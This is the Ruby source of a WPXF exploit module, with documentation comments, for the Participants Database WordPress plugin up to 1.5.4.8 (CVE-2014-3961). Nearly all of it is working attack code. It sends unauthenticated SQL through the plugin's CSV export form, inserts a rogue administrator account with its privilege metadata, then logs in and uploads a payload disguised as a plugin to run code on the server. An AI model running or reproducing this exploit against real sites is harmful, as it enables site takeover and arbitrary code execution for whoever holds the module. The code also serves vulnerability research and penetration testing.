class Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload

Public Class Methods

Calls superclass method Wpxf::Module::new
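# Registers the module's metadata and the datastore options it reads
# (sign_up_path, wp_prefix, user_id, username, password, email).
#
# The defaults for user_id, username, password and email are generated
# once, when the module is instantiated, so each instance carries its own
# random values.
def initialize
  super

  update_info(
    name: 'Participants Database <= 1.5.4.8 Shell Upload',
    desc: %(
      In versions <= 1.5.4.8 of the Participants Database, anonymous users
      are able to execute arbitrary SQL statements. This module utilises
      this vulnerability to create a new admin user and upload a payload
      masked as a plugin.
    ),
    author: [
      'Yarubo Research Team', # Vulnerability discovery
      'rastating'             # WPXF module
    ],
    references: [
      ['CVE', '2014-3961'],
      ['WPVDB', '7247'],
      ['EDB', '33613']
    ],
    date: 'Aug 01 2014'
  )

  register_options([
    StringOption.new(
      name: 'sign_up_path',
      desc: 'The relative path of the Participants Database sign up page',
      required: true
    ),
    StringOption.new(
      name: 'wp_prefix',
      desc: 'The database table prefix. Default: wp_',
      required: true,
      default: 'wp_'
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The ID number to use for the new admin account',
      required: true,
      # rand(range) yields an Integer in the inclusive range without
      # materialising the 30,001-element Array that Range#to_a.sample built.
      default: rand(60_000..90_000)
    ),
    StringOption.new(
      name: 'username',
      desc: 'The username to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'email',
      desc: 'The e-mail address to use for the new admin account',
      required: true,
      default: Utility::Text.rand_email
    )
  ])
end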

Public Instance Methods

# Determines whether the target runs an affected plugin version by reading
# the plugin's readme. The second argument is presumably the first release
# that is not affected; the comparison itself lives in the shared helper.
#
# @return the result of check_plugin_version_from_readme
def check
  fixed_version = '1.5.4.9'
  check_plugin_version_from_readme('participants-database', fixed_version)
end
# Logs in with the credentials held in the datastore, then hands the
# payload to the shared plugin-upload helper under two random names.
#
# NOTE(review): the value returned by authenticate_with_wordpress is passed
# straight on without being checked — confirm how the helper signals a
# failed login. A nil response from the upload helper also satisfies the
# final expression, so "no response" is reported as success here.
#
# @return [Boolean] true unless the helper returned a 404 response
def execute_payload
  emit_info 'Uploading the payload...'

  username = datastore['username']
  password = datastore['password']
  cookie = authenticate_with_wordpress(username, password)

  plugin_name = Utility::Text.rand_alpha(6)
  payload_name = Utility::Text.rand_alpha(6)
  res = upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)

  res&.code != 404
end
# Sends +query+ to the sign-up page as a multipart POST, using the form
# fields the plugin's CSV export handler reads. Field order matches the
# original builder calls.
#
# @param query [String] the SQL statement to submit
# @return whatever execute_post_request returns (the block's value is
#   passed back through Utility::BodyBuilder#create)
def execute_sql_query(query)
  fields = {
    'action' => 'output CSV',
    'subsource' => 'participants-database',
    'CSV_type' => 'participant list',
    'query' => query
  }

  builder = Utility::BodyBuilder.new
  fields.each { |field, value| builder.add_field(field, value) }

  builder.create { |body| execute_post_request(url: sign_up_url, body: body) }
end
# The datastore e-mail address as a 0x-prefixed hex literal, so it can be
# embedded in the generated SQL without quoting.
#
# @return [String]
def hexified_email
  hex = Utility::Text.hexify_string(datastore['email'])
  format('0x%s', hex)
end
# The hashed datastore password as a 0x-prefixed hex literal, so it can be
# embedded in the generated SQL without quoting.
#
# @return [String]
def hexified_password_hash
  hex = Utility::Text.hexify_string(password_hash)
  format('0x%s', hex)
end
# The datastore username as a 0x-prefixed hex literal, so it can be
# embedded in the generated SQL without quoting.
#
# @return [String]
def hexified_username
  hex = Utility::Text.hexify_string(datastore['username'])
  format('0x%s', hex)
end
# Builds the INSERT statement for the new row in the users table. The
# hexified username is reused for user_login, user_nicename and
# display_name; user_status is fixed at 0.
#
# @return [String] a single-line SQL statement terminated with ';'
def new_user_sql
  login = hexified_username
  columns = '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)'
  values = "(#{user_id}, #{login}, #{hexified_password_hash}, #{login}, #{hexified_email}, 0, #{login});"

  "insert into #{table_name('users')} #{columns} values #{values}"
end
# MD5 digest of the datastore password, as produced by Utility::Text.md5.
# NOTE(review): presumably a form the target's login accepts for user_pass;
# nothing on this page confirms it.
#
# @return [String]
def password_hash
  plaintext = datastore['password']
  Utility::Text.md5(plaintext)
end
Calls superclass method Wpxf::Module#run
# Module entry point. After the superclass checks pass, it inserts the new
# user row, writes the two usermeta rows that mark the account as an
# administrator, and finally delegates to execute_payload.
#
# NOTE(review): the return values of execute_sql_query are not inspected,
# so a failed insert is only discovered when execute_payload runs.
#
# @return [Boolean] false when the superclass run fails, otherwise the
#   result of execute_payload
def run
  return false unless super

  emit_info 'Creating a new user...'
  execute_sql_query(new_user_sql)

  emit_info 'Elevating user privileges...'
  privilege_meta = {
    'wp_user_level' => '10',
    'wp_capabilities' => 'a:1:{s:13:"administrator";b:1;}'
  }
  privilege_meta.each { |meta_key, meta_value| update_user_meta(meta_key, meta_value) }

  execute_payload
end
# Absolute URL of the plugin's sign-up page: the target's base URI joined
# with the relative sign_up_path option.
#
# @return the value returned by normalize_uri
def sign_up_url
  relative_path = datastore['sign_up_path']
  normalize_uri(full_uri, relative_path)
end
# Prefixes a bare table name with the wp_prefix option.
#
# @param name [String] table name without prefix, e.g. 'users'
# @return [String] the prefixed table name
def table_name(name)
  prefix = datastore['wp_prefix']
  [prefix, name].join
end
# Inserts one usermeta row for the new user by building the statement with
# user_meta_sql and submitting it through execute_sql_query.
#
# @param key [String] meta_key
# @param value [String] meta_value
# @return whatever execute_sql_query returns
def update_user_meta(key, value)
  statement = user_meta_sql(key, value)
  execute_sql_query(statement)
end
# The normalised value of the user_id option.
#
# @return the value returned by normalized_option_value('user_id')
def user_id
  option_name = 'user_id'
  normalized_option_value(option_name)
end
# Builds the INSERT statement for one usermeta row. Both key and value are
# embedded as 0x-prefixed hex literals rather than quoted strings.
#
# @param key [String] meta_key
# @param value [String] meta_value
# @return [String] a single-line SQL statement (no trailing ';')
def user_meta_sql(key, value)
  hex_key = "0x#{Utility::Text.hexify_string(key)}"
  hex_value = "0x#{Utility::Text.hexify_string(value)}"
  row = "(#{user_id}, #{hex_key}, #{hex_value})"

  "insert into #{table_name('usermeta')} (user_id, meta_key, meta_value) values #{row}"
end